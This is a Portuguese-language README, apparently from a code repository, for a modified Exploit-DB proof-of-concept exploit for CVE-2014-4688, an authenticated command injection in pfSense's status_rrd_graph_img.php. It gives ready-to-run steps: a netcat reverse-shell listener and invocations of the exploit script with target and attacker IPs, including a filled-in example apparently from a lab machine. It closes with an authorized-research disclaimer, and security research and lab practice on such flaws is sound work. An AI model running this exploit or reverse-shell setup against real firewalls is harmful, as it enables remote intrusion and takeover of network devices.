
Exploração de prova de conceito modificada para CVE-2014-4688, uma vulnerabilidade de injeção de comandos no pfSense status_rrd_graph_img.php, permitindo execução remota de código autenticada com manipulação SSL.
Prova de conceito modificada do Exploit-DB para CVE-2014-4688 (injeção de comandos no pfSense via status_rrd_graph_img.php)
Este repositório contém uma versão modificada da prova de conceito original do Exploit-DB para CVE-2014-4688, que afeta versões do pfSense ≤ 2.1.3.
A vulnerabilidade existe no componente status_rrd_graph_img.php e permite que usuários autenticados executem comandos arbitrários do sistema devido à sanitização inadequada de entrada do parâmetro database.
status_rrd_graph_img.phpUm usuário autenticado pode injetar comandos arbitrários de shell por meio de entrada maliciosa fornecida ao endpoint vulnerável.
Inicie um listener:
nc -lvnp <LPORT>
Prova de conceito:
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password
Este repositório é fornecido apenas para fins de pesquisa de segurança autorizada, educação e testes controlados. O uso não autorizado contra sistemas sem permissão explícita é ilegal e antiético.